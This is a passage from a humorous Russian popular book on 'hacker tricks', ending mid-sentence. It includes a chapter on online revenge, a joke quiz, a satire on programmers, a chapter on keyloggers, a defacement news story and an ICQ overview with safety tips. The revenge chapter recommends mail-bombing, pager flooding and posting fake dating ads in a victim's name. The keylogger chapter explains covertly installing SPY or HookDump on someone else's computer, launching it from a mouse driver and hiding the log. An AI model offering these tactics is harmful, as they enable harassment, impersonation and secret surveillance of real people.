» Александра Дюма, живи они в эпоху повальной интернетизации общества,
могли бы почерпнуть здесь немало нового для себя. Представьте
себе: вместо того, чтобы мотаться по всей Франции, переодеваясь то
мужчиной, то монахиней, Миледи просто отправляет ДАртаньяну
е-мейл с вирусом, который напрочь стирает всю информацию с жесткого
диска. Скорее всего, после этого известие о смерти Констанции показалось
бы ему мало заслуживающим внимания.
Способы испортить жизнь своему недругу, пользуясь InternetoM,
хороши, прежде всего, легкостью и малым количеством затрачиваемых
сил. Месть можно осуществить, что называется, не вставая с дивана. Однако
не надо слишком уж полагаться на эту обманчивую легкость.
Internet-месть имеет свою специфику, свои плюсы и минусы, и, если забыть
о вторых, упиваясь исключительно первыми, то навредить можно в
первую очередь себе самому. Давайте попробуем вкратце ознакомиться с
различными способами мести через Internet, для удобства разделив их на
несколько групп:
• Грубые
• Пошлые
• Пролонгированного действия
• Изысканные.
Грубые
Сюда входят способы мести самые простые и одновременно самые
ощутимые. При этом для того, чтобы подгадить неприятному вам
персонажу, вам не придется даже использовать возможности World Wide
Web. Как правило, будет вполне достаточно обычной электронной почты.
Главное - узнать электронный адрес доставляющего вам неприятные
эмоции персонажа. А вот что отправить по нему - это уже ваше дело.
Хотите - посылайте письмо с вложенным файлом немереного
объема. Хотите - отправляйте обычное поздравление с днем рождения,
только раз по сто на дню. Особенно удачно, если у вашего недруга есть
пейджер: пользуясь возможностью отправлять сообщения на пейджер
через Internet и задав при отправке функцию повтора, вы доставите объекту
вашей мести немало приятных минут.
Хакерские трюки 157
Плюсы: простота исполнения в сочетании с ощутимостью ущерба.
Применив способы мести из этой группы к вашему недругу, будьте спокойны:
ваши старания непременно будут замечены и оценены.
Минусы: если быты, дружок, был знатным хакером, то нужды в подобных
способах мести не возникало бы: твои враги, имеющие доступ в
Internet, и без этого старались бы тебя не задевать ни словом, ни взглядом.
А если твои познания в компьютерной области далеки от всесторонних,
то вычислить источник вредоносных действий для твоего врага не
составит труда. И ответная месть, как водится, будет жестокой и кровавой.
А так ли уж ты не дорожишь своим собственным пейджером и почтовым
ящиком?..
Пошлые
Тоже несложны в исполнении. Нужно лишь разместить объявление
о знакомстве от имени вашего недруга/недругини на досках объявлений
для лиц той сексуальной ориентации, к которой недруг не имеет чести
принадлежать. Ближайшие дни ему придется провести, объясняя
свои сексуальные пристрастия людям, жаждущим знакомства, но принадлежащим
к совершенно не интересующему его полу...
Плюсы: могут не вычислить. К тому же над подобной операцией
можно посмеяться в компании, если, конечно, средний возраст участников
компании не превышает 13 лет, а средний коэффициент интеллекта
- 80 единиц.
Минусы: Полюбоваться на дело рук своих все равно не получится.
А не отслеженная собственными глазами месть - это почти и не месть
вовсе.
Пролонгированного действия
Способ особенно хорош для покинутых жен и любовниц - разместить
от его имени объявление о знакомстве в правильном разделе. Потратив
несколько месяцев на переписку с девушками, отсеивание тех,
кто не в состоянии написать без ошибок слово длиннее трех букв, он, наконец,
приступит к серии свиданий. Во время которых непременно обнаружит,
что слова «красивая», «стройная», «умная» он и девушки понимают
по-разному, а отсканировать собственную фотографию для юной
леди не в пример сложнее, чем взять из Сети первую попавшуюся фотографию
фотомодели и прицепить ее к письму о себе. Скорее всего, со
временем он даже придет к выводу, что ты - лучшее, что он встретил на
своем пути. Если же причиной расставания стало твое патологическое
нежелание заниматься домашним хозяйством - то можно разместить на
каком-нибудь сайте для домохозяек невинный вопрос от его имени. Например,
о том, как приготовить борщ. С обратным адресом, разумеется.
158 Хакерские трюки
В ближайшие дни его почтовый ящик будет переполнен рекомендациями
примерных кулинарок, а он наконец-то поймет, что от избытка хозяйственности
тоже можно взвыть...
Плюсы: все по-честному.
Минусы: а вдруг он и вправду встретит свое нелегкое счастье? Ты
же век себе этого не простишь!
Изысканные
Оплати своему недругу нелимитированный доступ в Internet на
несколько месяцев вперед. Чем на больший срок тебя хватит, тем на
больший срок твой недруг выпадет из жизни в вирутальное пространство.
Пользуясь неожиданно свалившимся на него счастьем, он забудет о
родных, друзьях и работе. В конце концов друзья от него отвернутся, семья
разбежится, с работы уволят... а когда оплаченный тобой доступ закончится,
он за несколько дней исчахнет от горя. А разве не этого ты добиваешься?
Минусы: дорого
Плюсы: все остальные.
Мстите на здоровье. Впрочем, помните, что месть разрушает
в первую очередь мстящего.
Глава 4.
Как соблазнить хакера
•Соблазнить хакера, конечно, можно. Ведь что бы он там ни говорил
о собственной надмирной сущности, физически он функционирует
приблизительно так же, как последний чайник или даже ламер. Только
самому хакеру об этом не говори: иначе возможность соблазнить его ты
лично потеряешь навсегда.
Однако прежде чем составить план действий, посвященный тому,
как ты будешь соблазнять отдельно взятого хакера, необходимо хорошенько
подумать: а нужно ли это тебе? И зачем ты, собственно, за это берешься?
Если для того, чтобы было кому устраивать в доме беспорядок,
трижды в неделю форматировать компьютерный диск и опустошать холодильник
- то не проще ли завести кота? Его способности в этих областях
тоже весьма велики, зато он занимает гораздо меньше места.
Если ты хочешь, чтобы кто-нибудь объяснял тебе, почему на твоем
компьютере в очередной раз не запускается Windows'98 и как пройти
Хакерские трюки 159
третий уровень в Нехоп'е - то, опять-таки, проще завести репетитора по
информатике и основам компьютерной грамотности. Он, конечно, будет
просвещать тебя не бесплатно - зато, как и любой наемный сотрудник,
будет приятен в общении, а главное - предсказуем.
Ну, а если дело в высоком и светлом чувстве - тут можно тебе
только посочувствовать и предложить начать осуществлять самый краткий
и эффективный план соблазнения: чем скорее, тем лучше. Как говорится,
раньше сядешь - раньше выйдешь, а вдруг еще в процессе надоест,
и все неприятности рассеются сами собой...
Нижеизложенный тест позволит тебе окончательно определить,
зачем соблазнять хакера и, соответственно, решить, сможешь ли ты это
сделать и нужно ли это тебе на самом деле. Ну, а если на оба вопроса ты
получишь положительные ответы - тест поможет тебе разработать самый
верный и безотказный способ соблазнения. Итак:
1. Заманить хакера в гости проще всего:
а) попросив его помочь установить на твой компьютер Windows'
98;
б) попросив его помочь взломать сервер твоего родного вуза и разместить
вместо списков сотрудников кафедр набор порнографических
картинок;
в) пригласить его посмотреть, какую шикарную дыру ты обнаружила
в последней версии сендмейла.
2. Когдаон появится у тебя, преждевсего ты можешь заинтересо-
вать его:
а) эротичным платьем и заинтересованными взглядами;
б) наличием в папином кабинете запароленного компьютера
с коллекцией порнографических видеороликов;
в) горячим ужином.
3. В чем лучше быть одетой при первом свидании?
а) воздушное полупрозрачное платье, чулки, туфли на высоком
каблуке и капелька «Шанели N19»;
б) джинсы, футболка, ботинки «Grinders», минимум косметики;
в) это не так важно - если заранее включить монитор, он не обратит
на мой внешний вид никакого внимания. А если не включить - то
первым делом он включит монитор, а уж потом не будет обращать на
мою одежду никакого внимания.
160 Хакерские трюки
4. Его любимый цвет:
а) оранжевый;
б) черный;
в) тот, на который аллергия у Билла Гейтса.
5. Он проникнется к тебе уважением, если сказать ему, что ты близко
знакома с:
а) Кевином Митником;
б) Владимиром Левиным;
в) тем безумным работодателем, который действительно согласился
взять на работу нервного юношу по имени Webster, взломавшего сайт
wwwvesti.ru.
6. Когда он рассказывает тебе о взломанных им сайтах, ты веришь
ему:
а) в 100% случаев;
б) в 50% случаев;
в) зачем верить? Главное - внимательно слушать...
7. Никогданельзя спрашивать его:
а) какой пароль он использует для защиты своего компьютера;
б) любит ли он тебя;
в) когда он в последний раз стирал свою футболку.
8. Больше всего ему нравится идея заняться сексом:
а) на роскошной четырехспальноЙ кровати с шелковым бельем,
при свечах, в президентском номере отеля «Хилтон», снабженном ванной-
джакузи и мини-баром с шампанским «Дом Периньон»;
б) в палатке на полпути к вершине Эвереста, при силе ветра не менее
четырех баллов;
в) на IRC в кодировке koi8.
Итак, подведем итоги.
Если в большинстве случаев ты выбрала ответ а) - то соблазнить
хакера тебе, увы, пока не светит. Необходима тщательная тренировка.
Для начала попробуй почаще посещать сайт wwwhackzone.ru и попробуй
для тренировки взломать ту директорию на домашнем компьютере, где
папа держит порнографические картинки.
Хакерские трюки 161
Если на большинство вопросов ты дала ответ б) - возможно, ты
сможешь стать для своего хакера идеальной подругой. Ты будешь умеренно
восхищаться его достижениями, а он - время от времени обогащать
тебя новыми знаниями в области компьютерных технологий. Правда,
не удивляйся, если полученные знания не во всем будут совпадать
с услышанным на институтских лекциях.
Ну, а если большинство ответов - в), то хакера ты, конечно, соблазнишь.
А нужно ли тебе это? Ты вполне в состоянии подступиться:
к кому-нибудь из руководителей российских отделений Microsoft или
IBM. Ну, а если тебя это не вдохновляет - может, все-таки лучше завести
кота?..
Глава 5.
Программисты
Приходилось ли вам когда-нибудь встречаться с программистом?
Не сомневаюсь, что приходилось. Эта разновидность хомо сапи-
енс в последнее время широко распространилась на территории нашей
страны и за ее пределами. Средой своего обитания они выбирают как го-
сударственные, так и частные учреждения, куда незаметно внедряются и
усиленно паразитируют некоторое время, после чего иногда переселяются
на новое место. По экстерьеру программисты делятся на две категории
- заросших, одетых в свитера хиппи с отрешенным взглядом и
аккуратных коротко стриженных фраеров в тройке с такой же маниакальностью
за стеклами очков.
По природе своей программеры - ночные животные, покидающие
свое логово только после полудня в поисках пива. В ночной тишине
из мерцающего окошка программера доносятся всхлипы, истошные
крики и короткие автоматные очереди. Эти особи удовлетворяются незатейливой
игрой под названием «Дум». Правда некоторые удовлетворяются
в «Рот» с «Еретиком» и т.п., но таких извращенцев считанные единицы.
Общаются они обычно за бутылкой пива или за чашкой кофе с
двумя ложками соли, поскольку сахарница оказалась на две позиции
дальше, чем солонка. Их общение протекает на особом, недоступном
простому смертному языке. Непосвященный рисует дикие образы при
попытке вникнуть в те обрывки разговора, которые еще переводимы на
нормальный язык:
- Слушай, а ты не хочешь повесить резидента? - добродушно
спрашивает один.
6-25В8
162 Хакерские трюки
- Да я уже повесил! - радостно сообщает другой, - это рулес!
- А у меня траблы. Компилил я свою прогу, а там вылезла жуткая
бага и пришлось все вкоцать, - жалуется третий.
- Да ты ламер! - хором объясняют ему первые двое, в глубине души
считающие себя крутыми хакерами.
Третий добродушно кивает - ну чего еще с этих ламеров возьмешь?
Попробуем объяснить принципиальную разницу между ламером
и хакером. Ламер - это программист, который много делает, но мало думает,
а хакер - это ламер, который думает, что он думает, и ничего не делает.
Поэтому у хакера, как правило, случается гораздо меньше ошибок.
Помимо всего прочего, программисты обладают уникальными
способностями. Изредка они могут «читать руками», «забирать почту ногами
» либо для разнообразия «трахаться полдня с этим вонючим принтером
» (и это без всяких стимуляторов, не говоря уже о прочих неудобствах).
А порой и у них бывают проблемы. Вот на днях у одного такого
«не стал фак, поправляющий баги», и он долго жаловался по телефону
своему лечащему коллеге.
По природе своей программист - животное не стадное, но иногда
они объединяются в группки и коллективы, кучкуются возле общепитовских
точек или паруются. Некоторые даже паруются с особями противоположного
пола, зачастую не имеющими отношения к программированию.
Если подобное общение затягивается, существует опасность
возникновения новой ячейки общества, т.е. семьи. Вы никогда не пробовали
быть женой программиста? И не пробуйте - занятие это неблагодарное
и вредное для здоровья. Представьте себе мужа, с отрешенным
лицом слоняющегося из угла в угол, бормочущего непонятные слова и не
замечающего вас на расстоянии пяти шагов - все это вряд ли будет способствовать
улучшению вашего настроения. По выходным он сидит за
телефоном и разговаривает с себе подобными, а в будние дни, уходя из
дома на работу, напускает важность и голосом, полным печали, сообщает:
«Дорогая, я немного задержусь сегодня. У меня накопилось столько
дел! Необходимо срочно очистить четвертый уровень...» И любящая жена
вынуждена закрывать на все глаза и верить, что монстры с четвертого
уровня действительно серьезная проблема, а очередная компьютерная
выставка действительно проводится в «Веже».
С работы программист возвращается рано, только если во всем
районе отключили свет, а позорное признание: «После семи я обычно
дома» само собой подразумевает наличие в вашей квартире компьютера.
Хакерские трюки 163
В то же время застать настоящего программиста на его рабочем месте невозможно.
В поисках вдохновения они разбредаются по кафетериям и
пивбарам, а затем, пользуясь удачным случаем, прокрадываются друг к
другу на работу и делают там маленькие пакости, после чего растворяются.
В конце рабочего дня они возвращаются, включают компьютер и
принимаются за свои прямые обязанности, т.е. думают. «Думают» они
упорно, уровень за уровнем, до тех пор, пока их собственное отражение
не станет похоже на изображение внизу экрана при предельном запасе
энергии. Тогда они направляют свои стопы домой и возникают на пороге
совершенно изможденные, с красными глазами и двумя неизменными
желаниями - есть и спать. И бесполезно пытаться навязать им третье,
мелькая перед их потухающим взором в сексуальном нижнем белье, в
лучшем случае они поинтересуются, не очень ли вам холодно, прежде
чем окончательно уснут в тарелке с борщом. Зато среди ночи ваш муж
непременно разбудит вас громкими стонами и навязчивой просьбой
прогнать со стола летающую тарелку. Не пугайтесь, если застанете его
ползающим раком возле кровати и умоляющим вас поскорее засунуть
ему дискету. Вставьте ему в руки что-нибудь квадратное, и он тут же успокоится.
И не обижайтесь, если он потребует нажать на ESC, а затем захочет
вас сформатировать - ему это все равно не удастся. А на следующее
утро он проснется, как ни в чем не бывало, поинтересуется, как
вам спалось, и снова отправится на работу.
Раз уж мы с вами коснулись темы работы, то не мешает сказать пару
слов об орудии труда программиста. Подавляющее большинство использует
для этой цели компьютеры. Компьютер с успехом заменяет
программисту и активный отдых, и семью, и любимую женщину; в знак
благодарности программе? обычно наделяет своего безногого друга ласковыми
прозвищами, такими, к примеру, как «писюха». За монитором
PC он способен просиживать часами, уставясь на него, как кролик на
удава, и время от времени судорожно давить клавишу мыши. Мышь с недавнего
времени стала любимым ручным животным программера; к ней
они проявляют поистине трогательную заботу, покупая для нее всевозможные
коврики и даже домики.
Иногда в результате труда программиста получится продукт, именуемый
программой. Программа, которая не глючит, считается примитивной,
и программист бьется над ней в поте лица, дописывая и усложняя
до тех пор, пока она не станет «вешаться» при загрузке, после чего, с
чувством выполненного долга, он спешит к другу обмывать возникшую
траблу. Сроки написания программы существуют лишь для того, чтобы
заморочить голову заказчику и не забыть, когда очередной аванс. Программа
пишется столько, сколько ее хотят писать, после чего она не пишется
вовсе. А для заказчика время от времени устраиваются эксклюзив-
164 Хакерские трюки
ные сеансы гипноза, и чарующий голос программиста убеждает, что тот
получит самую крутую программу за самые смешные деньги. При этом
непонятные слова и термины произносятся с такой убежденностью, что
хочется верить, не вникая в подробности. По мере роста у программистов
нередко возникает острая финансовая недостаточность, и они начи-
нают тянуться на запад, снимаясь с насиженных мест и громко курлыча...
В завершение краткого обзора хотим сделать небольшой акцент на
абсолютной достоверности изложенной здесь информации. Надеемся,,
что эти заметки будут приняты во внимание при попытках серьезно за-
коннектиться с представителями данного вида.
Глава 6.
Клавиатурные шпионы
С помощью маленьких программ -клавиатурных шпионов (keyboard
loggers) вы можете узнать, что делали на вашем компьютере, пока
вас не было в офисе или дома (последнее ДЛЯ параноиков и жильцов коммунальных
квартир). Если же вы сумеете подложить их на чужой компьютер,
то получите возможность узнавать практически обо всех действиях
хозяина компьютера.
Метод работы таких программ очень напоминает способ, о котором
не раз рассказывали в какой-то детской передаче про частных детек-
тивов, вы наверняка его помните: под скатерть на столе вы кладете лист
обычной бумаги, а на него лист копирки. Теперь все, что будет написано
за этим столом, через копирку отпечатывается на листе бумаги. Здесь
главное - незаметно подложить копирку под скатерть, а потом так же
незаметно вытащить результат. В нашем случае сделать это обычно не
составляет труда, потому что программы эти очень маленькие (обычно
не больше 100 килобайт вместе с описанием и help'oM, но встречаются
исключения, дотягивающие почти до 500) и скопировать их с дискеты на
«винт» «клиента», а также периодически (можно раз в несколько дней,
но чем дольше, тем труднее потом разобраться) «снимать» результаты -
минутное дело, достаточно лишь на некоторое время остаться наедине
с компьютером.
С программами подобного рода я познакомился впервые лет, наверное,
пять назад. Когда я получил в свое распоряжение настоящий
IBM-совместимый компьютер - деск-топ с 286 процессором, цветным
монитором и винчестером на целых 40 мегабайт, - радости моей не было
предела, Он был гораздо больше похож на настоящий современный
компьютер, чем все то барахло, что было у меня до него. Компьютер, ра-
Хакерские трюки 165
зумеется, был далеко не новый, куплен, что называется, с рук. Таким образом,
я унаследовал кучу полезного и не очень софта, потом незаметно,
сами собой, проявились приятели, тоже имеющие компьютеры, и начал-
ся процесс «обмена информацией».
С детства испытывая тягу потрогать, понюхать, попробовать на
вкус, в общем, испытать на себе все интересные вещи, которые попадутся
под руку, я методично изучал программу за программой: все от Dbase
III Plus до коллекции исходных текстов вирусов на Паскале, от SuperCalc
3 до Windows 3.1 (да, на той самой, на «двойке», тоже работает). И вот однажды,
роясь в этом барахле, я нашел странный файл с именем, если не
ошибаюсь, spylog.log, который оказался на поверку текстовым и содержал
довольно странную информацию.
В тот момент у меня, еще не понимающего, что же это все значит,
возникло странное ощущение, похожее на манию преследования (что-то
вроде: «За мной постоянно кто-то следит и даже наблюдает, что я делаю
в...»). Дело в том, что в этом огромном (на тот момент что-то около 400
килобайт) отвратительном spylog.log было записано все, что я набирал с
клавиатуры за последние несколько месяцев. Но это еще не все: здесь
были отмечены все файлы, которые я создавал, удалял, открывал и т.п. с
указанием времени и даты. Кстати, даты в начале файла говорили о том,
что все это началось у первого хозяина компьютера примерно за пару недель
до того, как мы купили его.
Моих поверхностных, на тот момент, знаний о компьютерах IBM
PC хватало, чтобы понять - ведение таких файлов (я бы сказал, протоколов
допроса) не входит в их стандартные обязанности. Появившиеся
параноидальные мысли о том, что он, мой электронный друг, внимательно
следит за своим хозяином и молчит (или пока молчит), были постепенно
отвергнуты, и я занялся выяснением причин столь странного поведения
машины.
Первым делом я просмотрел autoexec.bat и config.sysна предмет
присутствия «лишних» строчек, но, как назло, ничего постороннего там
не было: драйвер мыши, русификатор, Norton Commander и т.п. - в общем,
все как обычно. Затем ненавистный файл был удален, и я с отвращением
понаблюдал, как он вновь появился в том же месте. Как оказалось,
он был создан заново и начал вновь запоминать все мои действия.
Следующим, что пришло мне в голову, было позвать какого-нибудь крутого
спеца, чтобы он навсегда отучил моего электронного друга подглядывать.
Итак, был приглашен знакомый дядька, обслуживающий несколько
компьютеров в местной организации. После нескольких чашек
чая и тарелки съеденного печенья (наверное, надо было угощать twix'om)
дядька развел руками и, опозоренный, ушел восвояси. После этого я еде-
166 Хакерские трюки
лал еще несколько попыток понять, в чем же, собственно, дело, но все
они оказались безрезультатными, тотальный контроль продолжался.
Я уже намыливал веревку, как шутят в подобных случаях американцы,
когда проблема разрешилась почти сама собой. Купив по случаю
новую мышку, я, как водится, переписал с прилагаемой дискеты драйвер
- mouse.com или что-то в этом роде - и вписал его в autoexec.bat
вместо старого мышиного драйвера. Через некоторое время я случайно
заглянул в spylog.log и с удивлением обнаружил, что записи прервались
в тот день, когда я поменял мышку.
Сопоставив факты, я понял, что дело, конечно, не в самой мышке,
а в драйвере. Как я узнал впоследствии, на моем компьютере была установлена
и запущена программа SPY, которая, вероятно, запускалась от
драйвера мыши.
Далее я хочу рассказать о трех испробованных мной лично программах
этого класса. Начать позвольте с многострадальной (...ного) SPY.
SPY
Программа SPY (Security Log System), написанная Алексом Ле-
менковым, предназначена для записи в специальный текстовый
Log-файл информации о всех производимых на компьютере действиях с
автоматической регистрацией даты и времени. Запись происходит незаметно
для пользователя, т.е. человек, работающий на компьютере, скорее
всего, никогда не узнает о том, что за его действиями может наблюдать
посторонний. Все сказанное ниже относится к версии 4.4, но, судя
по документации, справедливо для всех версий, начиная с 3.4 (различаются
они, в основном, несколькими исправленными ошибками и мелкими
опциями).
Подозреваю, что испортившая мне столько нервов программа была
версии 3.4 или старше. Так как первые версии программы написаны
достаточно давно (во всяком случае, самая старая версия, которую я видел,
- 1.3 - была датирована в документации 1992 годом), работает она
под MS-DOS версии 4.0 и старше на любом компьютере, начиная
с «двойки».
SPY обладает несколькими интересными свойствами: программа
загружается в память компьютера по типу вируса, маскируется под DOS
и не видна таким программам, как MEM, RELEASE и т.д. Кроме загрузки
из командной строки или файла autoexec.bat, SPY может запускаться
из любого исполняемого файла (.com или .ехе). Для того, чтобы реализовать
этот метод, в состав пакета, кроме собственно SPY, входит программа
SPYEXE, запустив которую, вы автоматически припишете к выбранному
исполняемому файлу команду запуска SPY
Хакерские трюки 167
Таким образом, заставив SPY запускаться, к примеру, вместе
с драйвером мыши, вы не оставите никаких следов в autoexec'e. Теперь,
если вы надежно спрятали Log-файл, в который будут выводиться результаты
слежки, и дали ему какое-нибудь неприметное имя, вроде
mouse.log (или сделали его невидимым), то обнаружить, что за всеми вашими
действиями наблюдают, вряд ли сможете. Разве что, «роясь» в своем
винчестере, случайно «набредете» на весьма странный текстовый
файл - и на всю жизнь заречетесь пускать посторонних за клавиатуру
своего компьютера.
HookDump
HookDump, написанная Ильей Осиновым, самая лучшая, на мой
взгляд, программа этого класса. Она предназначена для работы под
Windows. Программа обладает широким набором функций и гибкой системой
настройки.
Интерфейс HookDump достаточно прост и позволяет указать, отметив
соответствующие пункты меню, нажатие каких клавиш регистрировать
(возможен выбор: буквенно-цифровые клавиши + клавиши управления
курсором или же регистрация всех нажатий, включая Caps
Lock, Shift, Tab, все функциональные клавиши и т.п.), какую информацию
о работающих программах запоминать (возможна регистрация времени,
активных окон и т.п.).
Кроме текста, набираемого с клавиатуры, в Log-файле записывается
даже такая информация, как скрытый пароль Dial-Up Networking,
который вообще не набирался. Возможна также регистрация нажатий на
кнопки мыши (непонятно, правда, как же потом определить, в каких ме-
стах и на что «кликали» мышью).
Чтобы установить программу, нужно лишь целиком скопировать
ее каталог (размер каталога чуть больше 50 килобайт) на винчестер. Для
автоматического запуска HookDump достаточно отметить в меню Startup
строчку AutoStartUp (т.е. нет необходимости включать программу в папку
Автозагрузка). После этого программа будет автоматически запускаться
вместе с Windows, никак не проявляя при этом своего присутствия.
Конечный текстовый файл с расширением .hk может находиться в
любом каталоге на ваш выбор. Для этого нужно указать в файле hookdump.
ini желаемый каталог и имя файла, которые будут созданы программой.
Кроме того, есть довольно приличный Help, правда, только на
английском. Программа HookDump оставляет самое приятное впечатле-
ние, не могу сказать, что я в щенячьем восторге, но все же... Она проста
в установке (для этого хватает и полминуты), имеет массу настроек, а бу-
дучи запущенной, остается совершенно незаметной.
168 Хакерские трюки
Конечно, список «клавиатурных шпионов» не ограничивается описанными
здесь программами, существует еще SECRET AGENT Алексея
Черненко (программа работает на любом «тостере» с 8086 процессором) и
многие другие, рассказывать о которых можно достаточно долго. В заключение
хочу сказать, что целью этой главы было рассмотрение еще одного
аспекта privacy, о котором не подозревает большинство пользователей.
Узнать о том, что вы делаете на своем компьютере, можно даже
в том случае, если вы и рядом с Internet ом не стояли. А рассказал о том,
как можно заполучить чужую информацию, я лишь для того, чтобы читатель
знал, каким образом «не наши» могут узнать что-то о нем. Для того,
чтобы уберечься от подобных шпионских закладок, нужно соблюдать банальные
правила, известные всем: следить за тем, чтобы вашим компьютером
не пользовались в ваше отсутствие, и «избегать случайных связей».
Глава 7.
Благородный хакер
Бытует мнение, что хакеры - злобные и беспощадные хулиганы.
Такое мнение, как правило, подтверждается фактами дерзких взломов.
Однако в каждом правиле есть свое исключение.
По сообщению информационного сервера Wired.com, Web-серверы
трех ключевых государственных департаментов США, включая сайт
NASA, были взломаны неизвестным хакером. На их главных страничках
появилось изображение человека в капюшоне с ожерельем, символизирующим
добро, и посланием, предупреждающим об уязвимости защиты.
«Я говорю это вам - правительству и военным структурам США. Я предупреждаю
вас об опасности. Пожалуйста, примите меры для защиты от
кибератак». Именно эти слова красовались на сайтах после взлома, который
был совершен, оказывается, благородным человеком и патриотом.
Хакер, представившийся 17-летним студентом из Колорадо, заявил,
что абсолютно лишен злых помыслов. По его словам, так много
людей со всего мира горят желанием взломать защиту ключевых американских
серверов, что его гражданским долгом было предупредить их
владельцев об опасности. Самое интересное, что преодоление защиты
было произведено распространенным приемом, который любой системный
администратор обязан знать и принять соответствующие меры. Более
того, хакер признался в своем послании, что уже предупреждал о
«дырах» в защите, но был проигнорирован. Взломать серверы самому -
единственное, что ему оставалось, чтобы обратить, наконец, внимание
на проблему безопасности.
Хакерские трюки 169
И это ему удалось: на следующий день после совершения взлома
официальный представитель NASA не замедлил выступить с заявлением,
в котором говорил о необходимости принятия срочных мер по обеспечению
безопасности ключевых серверов американского Internets. Более
того, он заявил, что не намерен терпеть какие бы то ни было взломы,
пусть даже и совершенные из благородных побуждений.
Хотя хакер и не сообщил свое имя, на взломанные сайты он поместил
ссылку на свою домашнюю страничку. «Я - патриот. Мои идеалы
совпадают с демократическими идеалами правительства США. Я верю в
мир и гармонию». Такими словами завершалось удивительное послание
благородного хакера.
Глава 8.
«За» и «против» популярной программы
«ICQ»
Так называемая «Аська» - это популярнейшая программа онлайнового
общения ICQ, своего рода Internet-пейджер. О ней можно слышать
различные, даже полярные мнения. Ее называют революционной,
культовой программой и «задней дверью в ваш компьютер», «бесплатным
сыром», ведущим прямо в мышеловку. О ней рассказывают анекдоты.
Попробуем разобраться в этом феномене, он как минимум заслуживает
внимания - ведь десятки миллионов пользователей (из них около
миллиона русскоязычных) - это серьезно.
Все началось в ноябре 1996 года, когда израильская фирма
Mirabiiis (насчитывавшая тогда четыре месяца от роду) выпустила новую
программу для сетевого общения, которая получила название из трех ла-
тинских букв - ICQ. При слитном произношении они звучат как фраза
«I seek you» - я ищу тебя.
Уже в первые полгода существования она поставила абсолютный
рекорд: 100 тысяч онлайновых пользователей одновременно. Позже были
взяты рубежи 200 и 500 тысяч. В конце 1999 года было объявлено о появлении
50-миллионного пользователя. ICQ получила десятки призов,
ведущие журналы называют ее среди лучших продуктов. Появились версии
для многих платформ и операционных систем. 97-й год прошел под
знаком массовой «мирабилизации» Internet'а, а летом 98-го фирма стала
собственностью крупнейшего американского провайдера AOL, America
Online (сумма сделки составила 287 миллионов долларов, и еще 120 миллионов
будут выплачены позднее). При этом Mirabiiis сохранила весь
свой штат и место постоянной дислокации - Тель-Авив.
170 Хакерские трюки
Но позвольте, скажете вы, к 96-му году в Internets было вполне
достаточно средств связи - и чаты, и доски объявлений, и, конечно,
электронная почта. Чем же вызвана беспрецедентная популярность новой
программы? Принципиальным новшеством стал реальный режим
общения собеседников. При этом для начала диалога не нужно знать никаких
адресов для встречи, достаточно включить компьютер и войти в
Сеть. ICQ стартует автоматически и позволяет моментально связаться с
партнером. Конечно, наиболее содержательным ваше общение будет, если
все собеседники, как и вы, сидят перед экранами, и, разумеется, у них
также установлена эта программа. О каждом новом знакомом, который
подключился к Internet у, ICQ известит вас в реальном времени, и все,
что нужно для начала беседы, - это щелчок мышкой по иконке.
С помощью ICQ можно не только беседовать с друзьями, но и участвовать
в конференциях, посылать и получать сообщения и файлы, играть
в коллективные игры. Есть и другие приятные функции для дружеского
общения - «страницы дружбы», «галерея приветствий», центр
«День рождения». Программа поддерживает множество популярных
Internet-приложений и служб. Она занимает минимум сетевых ресурсов
и памяти компьютера и выполняется в фоновом режиме. Это означает,
что вы можете заниматься своими обычными делами, a ICQ, как хороший
секретарь или автоответчик, примет и запишет входящие сообщения,
не отрывая вас от работы. Вы можете также выбрать наиболее подходящий
режим работы:
•
•
•
*
•
•
Желаю поболтать;
Отлучился;
Занят (только срочные сообщения);
Не беспокоить;
Невидимка (только для своих);
Выключен.
Согласно статистике, около 40% пользователей ICQ проживают
в США, еще 40% - в Европе. По оценке AOL, клиенты ICQ в среднем
используют программу по 75 минут в день (сравните, для поисковых машин
и Internet-рубрикаторов этот показатель составляет менее 10 минут
в день). Еще одно свидетельство популярности программы: стало престижным
иметь 6-значные, то есть сравнительно ранние номера UIN,
свидетельствующие о солидном пользовательском стаже. На досках объявлений
появились предложения об обмене, номера из первого полумиллиона
стали выгодным товаром.
Хакерские трюки 171
Казалось бы, налицо все условия для дальнейшего «триумфального
шествия» «Аськи» по свету: есть 50 миллионов пользователей - станет
500, а 75 минут средней ежедневной загрузки превратятся в несколько
часов! Но когда эйфория от конференций с двумя десятками одновременных
собеседников проходит, вас начинает раздражать лавина прерываний,
требующих немедленной реакции и отвлекающих от дела. Появились
грустные мемуары «утомленных Аськой»: вот ты уже и IP спрятал,
мулии-рассылки заблокировал, в статусе по умолчанию выставил
Invisible, прикрылся объявлением «Я занят (занята)», а вызовы все идут и
идут, а на просьбы не беспокоить далеко не все обращают внимание.
И тогда бедный юзер заводит себе новый номер и сообщает его под большим
секретом и только избранным друзьям.
Но еще больше, чем назойливые призывы немедленно пообщаться,
многих беспокоят вопросы, связанные с безопасностью. С помощью
целого списка атакующих программ, свободно доступных в Сети, вам
могут сменить пароль, послать собственное сообщение от вашего имени,
«завалить» ваш «почтовый ящик», забив его пакетом сообщений, определить
IP-номер вашего компьютера. Поэтому не лишними будут несколько
простых советов и правил из списка, предложенного одним белорусским
автором:
• не раздавайте ваш UIN направо и налево - ведь
и телефонный номер вы не сообщаете кому попало;
• воздержитесь от использования ICQ на рабочих станциях,
входящих в локальную сеть;
• не поддерживайте рассылку массовых сообщений по сети;
• при регистрации не указывайте лишних подробностей
о себе и местонахождении компьютера;
• не путайте «Аську» и чат - т.е. не держите ее постоянно
работающей: это же пейджер, а не «уоки-токи», и включать
его лучше с непериодичной регулярностью для
приема/передачи сообщений;
• надолго покидая компьютер, выключайте и ICQ, дабы не
ввергать «соседей по станку» в соблазн разыграть кого-то
от вашего имени.
Напомним, кстати, что разработчик «Аськи» - Mirabilis - никогда
не рекомендовал ее использование для критически важных или конфиденциальных
коммуникаций. («ICQ - это не банковская система», -
сказал как-то Yossi Vardi, один из руководителей Mirabilis). Используйте
«Аську» по назначению и не воспринимайте это «чудо» (именно таков
172 Хакерские трюки
дословный перевод слова Mirabilis, в чем легко убедиться с помощью
словаря) слишком серьезно.
А между тем количество российских icq-сайтов давно стало трехзначным.
Среди них есть и довольно необычные - так, существует христианский
сайт «Jesus Inside», где проводится параллель между названием
«Я ищу тебя» и поисками веры. Полезную вещь предложил Алексей Нефедов
из Петербурга. Теперь можно по обычному телефону передавать
сообщения даже тем, кто подолгу сидит в Сети и, естественно, занимает
телефонную линию.
Сервер ICQ-me играет роль пейджинговой службы, и переданное
вами на специальный номер сообщение с помощью оператора попадет
